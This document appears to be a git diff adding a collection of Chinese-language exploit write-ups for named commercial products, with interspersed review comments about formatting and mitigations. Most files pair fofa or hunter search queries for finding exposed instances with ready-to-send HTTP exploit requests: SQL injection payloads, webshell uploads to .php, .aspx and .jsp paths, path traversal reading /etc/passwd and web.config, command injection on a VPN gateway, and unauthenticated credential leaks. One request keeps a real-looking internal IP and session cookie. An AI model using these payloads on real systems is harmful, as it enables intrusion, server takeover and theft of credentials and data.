+++ b/购物商城系统commodtiy存在任意SQL注入漏洞.md @@ -0,0 +1,25 @@ +## 购物商城系统commodtiy存在任意SQL注入漏洞 + 购物商城系统commodtiy存在任意SQL注入漏洞 + +## fofa +```plain +"/public/gwc.php" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1715270637996-7f6f5141-b58d-4ecc-af15-6b309fb958a3.png) + +## 三、漏洞复现 +```http +POST /public/commodtiy.php HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Connection: close + +ddxq='||(SELECT 0x4776756d WHERE 3443=3443 AND (SELECT 9303 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||' +``` + + + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731861954485-5da4b05c-698c-40e1-a7d4-7819586d55df.png) + diff --git a/费浦门禁出入口安防平台aDKManageUser存在未授权访问.md b/费浦门禁出入口安防平台aDKManageUser存在未授权访问.md new file mode 100644 index 0000000..2bcee7b --- /dev/null +++ b/费浦门禁出入口安防平台aDKManageUser存在未授权访问.md 
@@ -0,0 +1,29 @@ +# 费浦门禁出入口安防平台aDKManageUser存在未授权访问 + +# 一、漏洞简介 +ADKFP门禁出入口综合安防管理平台,企业出入口系统采用两级运营管理方式,即“集中控制,分散管理”的方式实现企业管理中心和各企业合作运营的管理模式。 企业出入口系统的所有功能,都是以功能模块的形式提供。模块化的好处是能适应用户的需求,系统可任意搭配,互相配合,能够组合式适应用户需要,与用户的管理模式紧密结合。系统覆盖基础平台、身份信息平台、设备管理、门禁管理、考勤管理、访客管理、车辆门禁、电子门锁管理、移动端管理,智能办公模块包含智能迎宾、会议签到、布控抓拍、报警信息推送等多个应用子系统,所有子系统可实现信息共享,统一服务于整个企业出入口平台。 ADKFP门禁出入口综合安防管理平台存在接口未授权访问,可通过访问接口获取系统账号及密码,进而登录系统后台进行下一步渗透。 + +# 二、影响版本 ++ ADKFP门禁出入口综合安防管理平台 + +# 三、资产测绘 ++ fofa`body="/adkfp/getCode"` ++ 特征 + +![1706857311657-f58b56c0-f770-4251-a2a0-1787c92a822c.png](./img/ktohE5l624w9N9pn/1706857311657-f58b56c0-f770-4251-a2a0-1787c92a822c-140071.png) + +# 四、漏洞复现 +```plain +/aDKManageUser/selectCll_2?roleId=2&page=1&limit=10 +``` + +![1706857390853-836d88a9-ebf3-4edb-8182-9f83e003069d.png](./img/ktohE5l624w9N9pn/1706857390853-836d88a9-ebf3-4edb-8182-9f83e003069d-704744.png) + +使用泄漏的账号密码登陆系统 + +![1706857658157-491df212-b97a-4a02-bfe1-32ff502f5d00.png](./img/ktohE5l624w9N9pn/1706857658157-491df212-b97a-4a02-bfe1-32ff502f5d00-287209.png) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: \ No newline at end of file diff --git a/资产管理运营系统comfileup前台文件上传漏洞.md b/资产管理运营系统comfileup前台文件上传漏洞.md new file mode 100644 index 0000000..144b6c3 --- /dev/null +++ b/资产管理运营系统comfileup前台文件上传漏洞.md 
@@ -0,0 +1,47 @@ +# 资产管理运营系统comfileup前台文件上传漏洞 + +# 一、漏洞简介 +湖南众合百易信息技术有限公司(简称:百易云)成立于2017年是一家专注于不动产领域数字化研发及服务的国家高新技术企业,公司拥有不动产领域的数字化全面解决方案、覆盖住宅、写字楼、商业中心、专业市场、产业园区、公建、后勤等多种业态、通过数字化帮助企业实现数字化转型,有效提高公司管理水平及业务办理效率、降低运营成本,公司自成立以来,已帮助众多企业实现数字化转型。资产管理运营系统comfileup前台文件上传漏洞 + +# 二、影响版本 ++ 资产管理运营系统 + +# 三、资产测绘 ++ fofa`body="media/css/uniform.default.css" && body="资管云"` ++ 特征 + +![1721891230963-ab71a358-6ed2-4ca8-9c97-c78fd2421899.png](./img/Wqde2Cpvw4X5b-Ms/1721891230963-ab71a358-6ed2-4ca8-9c97-c78fd2421899-329885.png) + +# 四、漏洞复现 +```plain +POST /comfileup.php HTTP/1.1 +Host: +Content-Type: multipart/form-data; boundary=---------------------------289666258334735365651210512949 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Cookie: ASP.NET_SessionId=vkp4usonpxcstreczz05g113 +Accept: */* +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Length: 35827 + +-----------------------------289666258334735365651210512949 +Content-Disposition: form-data; name="file"; filename="1.php" +Content-Type: image/png + +123 +-----------------------------289666258334735365651210512949-- +``` + +![1721891324618-765acd68-6008-42a7-a922-189de659276e.png](./img/Wqde2Cpvw4X5b-Ms/1721891324618-765acd68-6008-42a7-a922-189de659276e-617875.png) + +```plain +/uploads/202407/0725/20240725-66a1f85ecfb2c.php +``` + +![1721891373679-8062bf4f-2c05-47bb-a7df-4ecad4c32900.png](./img/Wqde2Cpvw4X5b-Ms/1721891373679-8062bf4f-2c05-47bb-a7df-4ecad4c32900-079718.png) + + + +> 更新: 2024-08-12 17:15:59 +> 原文: \ No newline at end of file diff --git a/资产管理运营系统mobilefront2前台文件上传漏洞.md b/资产管理运营系统mobilefront2前台文件上传漏洞.md new file mode 100644 index 0000000..b26325b --- /dev/null +++ b/资产管理运营系统mobilefront2前台文件上传漏洞.md 
@@ -0,0 +1,37 @@ +# 资产管理运营系统mobilefront2前台文件上传漏洞 +湖南众合百易信息技术有限公司(简称:百易云)成立于2017年是一家专注于不动产领域数字化研发及服务的国家高新技术企业,公司拥有不动产领域的数字化全面解决方案、覆盖住宅、写字楼、商业中心、专业市场、产业园区、公建、后勤等多种业态、通过数字化帮助企业实现数字化转型,有效提高公司管理水平及业务办理效率、降低运营成本,公司自成立以来,已帮助众多企业实现数字化转型。资产管理运营系统mobilefront2前台文件上传漏洞 + +# fofa +```javascript +body="media/css/uniform.default.css" && body="资管云" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1721891230963-ab71a358-6ed2-4ca8-9c97-c78fd2421899.png) + +## poc +```java +POST /mobilefront/c/2.php HTTP/1.1 +Host: +Content-Type: multipart/form-data; boundary=---------------------------289666258334735365651210512949 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Length: 35827 + +-----------------------------289666258334735365651210512949 +Content-Disposition: form-data; name="file1"; filename="1.php" +Content-Type: image/png + + +-----------------------------289666258334735365651210512949-- +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1725009158273-6ced2659-9820-4f50-bc55-55e18fd6b2d5.png) + +```java +/mobilefront/c/images2/17250090851.php +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1725009187757-3a3a5fd4-f025-4ce9-9fa6-1834f403cb61.png) + diff --git a/赛思-SuccezBl前台任意文件上传.md b/赛思-SuccezBl前台任意文件上传.md new file mode 100644 index 0000000..eaee338 --- /dev/null +++ b/赛思-SuccezBl前台任意文件上传.md 
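Review bot: the fences are tagged with the wrong languages (```javascript around a fofa query, ```java around an HTTP request); use `plain` so renderers do not highlight a POC as code. `Content-Length: 35827` again does not match the body, and the `name="file1"` part is empty, so the request as written uploads a zero-byte `1.php`; note whether an empty file is enough to confirm the issue. This file also skips the `一、漏洞简介 / 二、影响版本 / 三、资产测绘` structure the rest of the repo uses; restructure it to match the comfileup write-up for the same product and add the same mitigation line.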
@@ -0,0 +1,28 @@ +## 赛思 SuccezBl前台任意文件上传 +``` +POST /succezbi/sz/commons/form/file/uploadChunkFile?guid=../tomcat/webapps/ROOT/&chunk=ss.jsp HTTP/1.1 +Host: 10.168.4.99:808 +Content-Length: 49564 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: null +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8GeAY18LCxR7XnVP +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8, application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN, zh;q=0.9 +Cookie: JSESSIONID=7351EFC189410384FF702A41106FF4A2 +Connection: close + +------WebKitFormBoundary8GeAY18LCxR7XnVP +Content-Disposition: form-data; name="file"; filename="www" +Content-Type: image/jpeg + +webshell + +------WebKitFormBoundary8GeAY18LCxR7XnVP +Content-Disposition: form-data; name="xxx" + +confirm +------WebKitFormBoundary8GeAY18LCxR7XnVP-- +``` diff --git a/赛普EAP企业适配管理平台Download.aspx任意文件读取漏洞.md b/赛普EAP企业适配管理平台Download.aspx任意文件读取漏洞.md new file mode 100644 index 0000000..c84573e --- /dev/null +++ b/赛普EAP企业适配管理平台Download.aspx任意文件读取漏洞.md @@ -0,0 +1,22 @@ +# 赛普EAP企业适配管理平台Download.aspx任意文件读取漏洞 + +赛普EAP企业适配管理平台 Download.aspx 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统文件,造成信息泄露。 + +## fofa + +```kotlin +body="IDWebSoft/" +``` + +## poc + +```javascript +GET /IDWebSoft/Common/Handler/Download.aspx?FileName=web.config&FileTitle= HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82Safari/537.36 +Content-Type:application/x-www-form-urlencoded +Accept: */* +Connection: Keep-Alive +``` + +![image-20241101195031794](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011950858.png) \ No newline at end of file 
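Review bot: in the 赛思 SuccezBl hunk, `Host: 10.168.4.99:808` and `Cookie: JSESSIONID=7351EFC189410384FF702A41106FF4A2` are values from a real capture (an internal address and a live session id); replace them with placeholders before publishing, as the other files do with an empty `Host:`. The file has no 简介/影响版本/资产测绘 sections and never states the root cause, although `guid=../tomcat/webapps/ROOT/&chunk=ss.jsp` shows the `guid` and `chunk` parameters being used as path components; add a sentence naming that and the mitigation (canonicalise and validate both parameters, reject path separators, write chunks only under a fixed directory).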
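Review bot: in the 赛普 Download.aspx hunk, the `## fofa` fence is tagged ```kotlin and the `## poc` fence ```javascript, both for plain text; retag as `plain`. `Chrome/89.0.4389.82Safari/537.36` is missing the space before `Safari`, and the file ends with `\ No newline at end of file`; add the trailing newline. The description says `web.config` can be read via `FileName=` but gives no affected version or fix reference; add both, and note that `FileName` must be restricted to the intended download directory.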
diff --git a/赛普EAP企业适配管理平台Upload存在任意文件上传漏洞.md b/赛普EAP企业适配管理平台Upload存在任意文件上传漏洞.md new file mode 100644 index 0000000..9d79099 --- /dev/null +++ b/赛普EAP企业适配管理平台Upload存在任意文件上传漏洞.md @@ -0,0 +1,36 @@ +# 赛普EAP企业适配管理平台Upload存在任意文件上传漏洞 +赛普EAP企业适配管理平台,是一款专门为房地产企业打造的数字化管理系统,旨在帮助企业实现业务流程的优化、管理效率的提升和客户体验的改善。系统集成了项目管理、销售管理、客户关系管理、财务管理、报表分析等多个模块,能够满足企业不同层级、不同部门的管理需求。通过采用灵活的配置机制,该系统可以根据不同企业的需求进行定制化配置,实现与企业业务的完美契合。赛普EAP企业适配管理平台Upload存在任意文件上传漏洞 + +## fofa +```javascript +body="IDWebSoft/" +``` + +## poc +```java +POST /IDWebSoft/Common/Handler/Upload.aspx HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate +Priority: u=0 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: multipart/form-data; boundary=---------------------------328367279028471380642525145085 +Accept: */* +Content-Length: 44892 + +-----------------------------328367279028471380642525145085 +Content-Disposition: form-data; name="Filedata"; filename="1.aspx" +Content-Type: image/png + +<% response.write("drwc2nymcirgr7r2bdgb111")%> +-----------------------------328367279028471380642525145085-- +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731434585150-3f3a308b-bfc8-477d-9e09-0b93e43169dc.png) + +```java +/IDWebSoft/Accessary/2024/11/cf9ebf1f-04f9-47f7-b2a3-aa22f74cf825.aspx +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731434601172-28e5ec47-8721-41eb-9010-76dce5d3d1a8.png) + diff --git a/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md b/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md new file mode 100644 index 0000000..00a4864 --- /dev/null +++ b/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md 
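Review bot: `Content-Length: 44892` does not match the one-line body, so the request will not replay as written; remove it or correct it. The `## fofa` / `## poc` fences are tagged ```javascript / ```java for plain text; retag as `plain`. The 简介 paragraph ends by restating the title (`赛普EAP企业适配管理平台Upload存在任意文件上传漏洞`) and gives no version or mitigation; add a sentence noting that the `Filedata` part keeps its `.aspx` name despite `Content-Type: image/png`, and that the fix is a server-side extension allow-list plus storage outside `/IDWebSoft/Accessary/`.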
@@ -0,0 +1,25 @@ +# 赛诸葛数字化智能中台系统login存在SQL注入漏洞 + +赛诸葛数字化智能中台系统 login 登录接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa +```javascript +body="static/index/image/login_left.png" || icon_hash="1056416905" +``` + +## poc +```javascript +POST /login HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br, zstd +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Connection: keep-alive + +username=1')) AND GTID_SUBSET(CONCAT(0x7e,(SELECT (ELT(3469=3469,version()))),0x7e),3469) AND (('fOfY'='fOfY&loginType=1&password=bbb8aae57c104cda40c93843ad5e6db8&phone_head=86&wx_openid=&member= +``` + +![image-20241227221000969](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272210041.png) \ No newline at end of file diff --git a/超易企业管理系统Login.ashx存在SQL注入漏洞.md b/超易企业管理系统Login.ashx存在SQL注入漏洞.md new file mode 100644 index 0000000..a4ead40 --- /dev/null +++ b/超易企业管理系统Login.ashx存在SQL注入漏洞.md @@ -0,0 +1,27 @@ +# 超易企业管理系统Login.ashx存在SQL注入漏洞 + +超易企业管理系统存在SQL注入漏洞,攻击者可获取数据库敏感信息。 + +## fofa + +```yaml +"超易企业管理系统" +``` + +## poc + +```java +POST /ajax/Login.ashx?Date=%271721821198459%27 HTTP/1.1 +Host: +Content-Length: 92 +Accept: text/plain, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +username=admin*&password=admin123&loginguid=&logintype=pc +``` + diff --git a/辰信景云终端安全管理系统login存在SQL注入漏洞.md b/辰信景云终端安全管理系统login存在SQL注入漏洞.md new file mode 100644 index 0000000..7483b1c --- /dev/null +++ b/辰信景云终端安全管理系统login存在SQL注入漏洞.md 
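Review bot: in the 赛诸葛 hunk, the sentence `未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。` is incomplete (`除了` has no following clause); write `未经身份验证的远程攻击者可利用 SQL 注入漏洞获取数据库中的信息。` The body shows the payload in the `username` field, but the text never names `username` as the injectable parameter or the backend (the `GTID_SUBSET` call is MySQL-specific); state both and add the fix (parameterised query on the login lookup). The fences are tagged ```javascript for a fofa query and an HTTP request; retag as `plain`.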
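Review bot: in the 超易 Login.ashx hunk, the body `username=admin*&password=admin123&loginguid=&logintype=pc` uses sqlmap's `*` injection marker, and `Date=%271721821198459%27` in the query string wraps the timestamp in quotes, but the text never says which of the two is the injection point or that `*` is a marker rather than part of the request; state it explicitly. `Content-Length: 92` does not match the 57-byte body; drop or fix it. The fofa fence is tagged ```yaml and the request ```java; retag as `plain`, and the 简介 should name the affected version and a fix.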
@@ -0,0 +1,32 @@ +# 辰信景云终端安全管理系统 login 存在SQL注入漏洞 + +# 一、漏洞简介 +辰信景云终端安全管理系统是辰信领创推出的新一代企业级反病毒安全防护软件, 为企业提供了一套专业可信赖的全方位终端安全解决方案。辰信景云终端安全管理系统 login 存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 辰信景云终端安全管理系统 + +# 三、资产测绘 ++ fofa`app="辰信领创-景云终端安全管理系统"` ++ 特征 + +![1706789257491-27df1e43-1efc-4ccb-8a8b-692fe60abd18.png](./img/EJ0iaJQbi88AjXxC/1706789257491-27df1e43-1efc-4ccb-8a8b-692fe60abd18-530366.png) + +# 四、漏洞复习 +```plain +POST /api/user/login HTTP/2 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Type: application/x-www-form-urlencoded +Content-Length: 102 + +captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(5))a)=' +``` + +![1706789300903-7f48eaf9-74bd-4d2f-97ee-dda7b81223fd.png](./img/EJ0iaJQbi88AjXxC/1706789300903-7f48eaf9-74bd-4d2f-97ee-dda7b81223fd-737141.png) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: \ No newline at end of file diff --git a/迈普pnsr2900x系统接口DOWNLOAD_FILE任意文件读取漏洞.md b/迈普pnsr2900x系统接口DOWNLOAD_FILE任意文件读取漏洞.md new file mode 100644 index 0000000..48dcc56 --- /dev/null +++ b/迈普pnsr2900x系统接口DOWNLOAD_FILE任意文件读取漏洞.md @@ -0,0 +1,21 @@ +# 迈普pnsr2900x系统接口DOWNLOAD_FILE任意文件读取漏洞 + +迈普pnsr2900x系统接口DOWNLOAD_FILE任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。 + +## fofa + +```javascript +body="/assets/css/ui-dialog.css"&& body="/form/formUserLogin" +``` + +## poc + +```javascript +GET /DOWNLOAD_FILE/../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 +Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Connection: keep-alive +``` + +![image-20241013140738432](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410131407485.png) \ No newline at end of file 
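Review bot: in the 辰信景云 hunk, the heading `# 四、漏洞复习` is a typo for `# 四、漏洞复现`, the section name every other file uses. The request line `POST /api/user/login HTTP/2` is written as HTTP/1.1-style text, but HTTP/2 is binary-framed and cannot be sent as this raw block; change it to `HTTP/1.1` or note that the capture came from a browser proxy. The time-based payload sits in the `username` parameter; name it as the injection point and add the vendor fix or a mitigation (parameterised login query).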
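Review bot: in the 迈普 pnsr2900x hunk, the line `Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) ...` has the User-Agent folded into the Host header, leaving `Host` with no value and a malformed request; split it into a `Host:` line and a `User-Agent:` line. `Connection: keep-alive` appears twice; drop one. The description is generic (`可能导致敏感信息泄露、数据盗窃及其他安全风险`) and names no version or fix; the path shows `../` traversal under `/DOWNLOAD_FILE/`, so a line on the cause (no path normalisation) and the mitigation (resolve to a canonical path and confine it to the download directory) would help defenders.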
diff --git a/迈普安全网关sslvpn_client存在远程命令执行漏洞.md b/迈普安全网关sslvpn_client存在远程命令执行漏洞.md new file mode 100644 index 0000000..cb599e1 --- /dev/null +++ b/迈普安全网关sslvpn_client存在远程命令执行漏洞.md @@ -0,0 +1,39 @@ +# 迈普安全网关sslvpn_client存在远程命令执行漏洞 + +# 一、漏洞简介 +迈普安全网关sslvpn_client存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 迈普安全网关 + +# 三、资产测绘 ++ hunter`app.name=="MAIPU 迈普 MPSec"` ++ 特征![1701762281066-80c83a70-903d-4273-a66a-5df08ae34227.png](./img/nYJI0-JcxcVBhRa7/1701762281066-80c83a70-903d-4273-a66a-5df08ae34227-374241.png) + +# 四、漏洞复现 +```java +GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e.png](./img/nYJI0-JcxcVBhRa7/1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e-132060.png) + +获取命令执行结果 + +```java +GET /sslvpn/ceshi.txt HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1701762342384-224cbced-19ed-428d-b26d-9957865251d2.png](./img/nYJI0-JcxcVBhRa7/1701762342384-224cbced-19ed-428d-b26d-9957865251d2-844096.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: \ No newline at end of file diff --git a/远秋医学培训报名系统User存在未授权账号密码泄露漏洞.md b/远秋医学培训报名系统User存在未授权账号密码泄露漏洞.md new file mode 100644 index 0000000..dd5267d --- /dev/null +++ b/远秋医学培训报名系统User存在未授权账号密码泄露漏洞.md 
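Review bot: `+ 特征![1701762281066-80c83a70-...png](...)` glues the screenshot to the bullet on one line, unlike the other files where the image sits on its own line; split it. The 简介 is a single sentence repeating the title, with no version, no CNVD/CVE reference and no fix. The request shows the `img` parameter of `sslvpn_client.php` reaching a shell (`|`, backticks, `tee`) and the reproduction leaves `ceshi.txt` under `/usr/local/webui/sslvpn/`; say so, add the mitigation (never pass `img` to a shell, validate it against an allow-list), and note that responders can check that directory for unexpected files left by earlier probes.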
@@ -0,0 +1,30 @@ +# 远秋医学培训报名系统User存在未授权账号密码泄露漏洞 + +# 一、漏洞简介 +远秋医学在线考试系统采用通用的试题库管理软件,适用于各级各类医学院校和医院。远秋医学在线考试系统某接口存在未授权信息泄露漏洞,攻击者可利用该漏洞获取数据库敏感信息。远秋医学培训报名系统v1.0存在未授权访问漏洞,攻击者可通过漏洞获取登录密码。 + +# 二、影响版本 ++ 远秋医学培训报名系统v1.0 + +# 三、资产测绘 +```plain +title="医学在线考试系统" +``` + +![1718993691264-f32b46f5-aee2-427a-927d-66a0611f6baa.png](./img/q7hZFjWmCGM7ykCO/1718993691264-f32b46f5-aee2-427a-927d-66a0611f6baa-072615.png) + +# 四、漏洞复现 +```java +POST /Manage/Ajax/User.ashx/ HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +oper=getManagerList&name=&code=&depart=&page=1&rows=15 +``` + +![1718993591536-7d8aac13-27e1-4b71-a358-2f92fd9f2d47.png](./img/q7hZFjWmCGM7ykCO/1718993591536-7d8aac13-27e1-4b71-a358-2f92fd9f2d47-022364.png) + + + +> 更新: 2024-08-28 15:30:39 +> 原文: \ No newline at end of file diff --git a/远秋医学培训报名系统v1.0ManagerList存在未授权账号密码泄露漏洞.md b/远秋医学培训报名系统v1.0ManagerList存在未授权账号密码泄露漏洞.md new file mode 100644 index 0000000..f6cc4e9 --- /dev/null +++ b/远秋医学培训报名系统v1.0ManagerList存在未授权账号密码泄露漏洞.md @@ -0,0 +1,30 @@ +# 远秋医学培训报名系统v1.0 ManagerList存在未授权账号密码泄露漏洞 + +# 一、漏洞简介 +远秋医学在线考试系统采用通用的试题库管理软件,适用于各级各类医学院校和医院。远秋医学在线考试系统某接口存在未授权信息泄露漏洞,攻击者可利用该漏洞获取数据库敏感信息。远秋医学培训报名系统v1.0存在未授权访问漏洞,攻击者可通过漏洞获取登录密码。 + +# 二、影响版本 ++ 远秋医学培训报名系统v1.0 + +# 三、资产测绘 +```plain +title="远秋医学培训报名系统v1.0" +``` + +![1718993325214-398499d2-2af5-4412-88af-a1260ffee33c.png](./img/H5wj7sp5XRf9yr1n/1718993325214-398499d2-2af5-4412-88af-a1260ffee33c-639148.png) + +# 四、漏洞复现 +```java +/User/ManagerList.aspx?ty=1&ty=1 +``` + +![1718993342894-79c3c62d-1bcc-48db-900b-10ebc348ffc5.png](./img/H5wj7sp5XRf9yr1n/1718993342894-79c3c62d-1bcc-48db-900b-10ebc348ffc5-960549.png) + +使用获取密码登录系统 + +![1718993436210-024def15-1cfe-4c15-a908-3ee6e49cad05.png](./img/H5wj7sp5XRf9yr1n/1718993436210-024def15-1cfe-4c15-a908-3ee6e49cad05-563873.png) + + + +> 更新: 2024-06-23 23:40:49 +> 原文: \ No newline at end of file 
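Review bot: in the 远秋 User.ashx hunk, the `# 一、漏洞简介` paragraph is copied from the 在线考试系统 write-up (`远秋医学在线考试系统采用通用的试题库管理软件...某接口存在未授权信息泄露漏洞`) and only its last sentence refers to the product in the title, 远秋医学培训报名系统v1.0; likewise the fingerprint is `title="医学在线考试系统"` while the sibling file for the same product uses `title="远秋医学培训报名系统v1.0"`. Make the description and fingerprint consistent with the title, and add the fix (require authentication on `/Manage/Ajax/User.ashx` for `oper=getManagerList`).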
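Review bot: in the 远秋 ManagerList hunk, `使用获取密码登录系统` is missing `的`; write `使用获取的密码登录系统`. The path `/User/ManagerList.aspx?ty=1&ty=1` repeats the `ty` parameter without saying whether the duplicate is required for the access-control bypass; state it, since defenders need to know which request shape to block. The 简介 is the same copied 在线考试系统 text as the sibling file; replace it with a sentence about this product, the affected version and the fix.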
diff --git a/远秋医学培训报名系统v1.0NewsDetailPage存在SQL注入漏洞.md b/远秋医学培训报名系统v1.0NewsDetailPage存在SQL注入漏洞.md new file mode 100644 index 0000000..ce76f3c --- /dev/null +++ b/远秋医学培训报名系统v1.0NewsDetailPage存在SQL注入漏洞.md @@ -0,0 +1,30 @@ +# 远秋医学培训报名系统v1.0 NewsDetailPage存在SQL注入漏洞 + +# 一、漏洞简介 +远秋医学在线考试系统采用通用的试题库管理软件,适用于各级各类医学院校和医院。远秋医学在线考试系统某接口存在未授权信息泄露漏洞,攻击者可利用该漏洞获取数据库敏感信息。远秋医学培训报名系统v1.0 NewsDetailPage存在SQL注入漏洞 + +# 二、影响版本 ++ 远秋医学培训报名系统v1.0 + +# 三、资产测绘 +```plain +title="远秋医学培训报名系统v1.0" +``` + +![1718993325214-398499d2-2af5-4412-88af-a1260ffee33c.png](./img/22HsGx4nQsThBnpU/1718993325214-398499d2-2af5-4412-88af-a1260ffee33c-296659.png) + +# 四、漏洞复现 +```java +python3 sqlmap.py -u "http://127.0.0.1/NewsDetailPage.aspx?key=news&id=7" --batch +``` + +![1718994328603-cd1448e2-a900-4be9-98c7-866fd3dc3120.png](./img/22HsGx4nQsThBnpU/1718994328603-cd1448e2-a900-4be9-98c7-866fd3dc3120-208793.png) + +stacked queries + +![1718994346902-a7e365cb-368e-4050-9a4e-a1f5527cb372.png](./img/22HsGx4nQsThBnpU/1718994346902-a7e365cb-368e-4050-9a4e-a1f5527cb372-205010.png) + + + +> 更新: 2024-06-23 23:40:49 +> 原文: \ No newline at end of file diff --git a/迪威讯Focus6100音视频通讯平台存在任意用户删除.md b/迪威讯Focus6100音视频通讯平台存在任意用户删除.md new file mode 100644 index 0000000..3fe1718 --- /dev/null +++ b/迪威讯Focus6100音视频通讯平台存在任意用户删除.md 
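Review bot: the 简介 again reuses the 在线考试系统 paragraph and ends on the bare title `远秋医学培训报名系统v1.0 NewsDetailPage存在SQL注入漏洞` with no full stop; the line `stacked queries` between the screenshots is a fragment, not a sentence. The sqlmap command targets `http://127.0.0.1/NewsDetailPage.aspx?key=news&id=7` but never says which of `key` or `id` is injectable or which DBMS sqlmap identified; state the parameter, label `127.0.0.1` as a placeholder, and add the fix (parameterise the news lookup).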
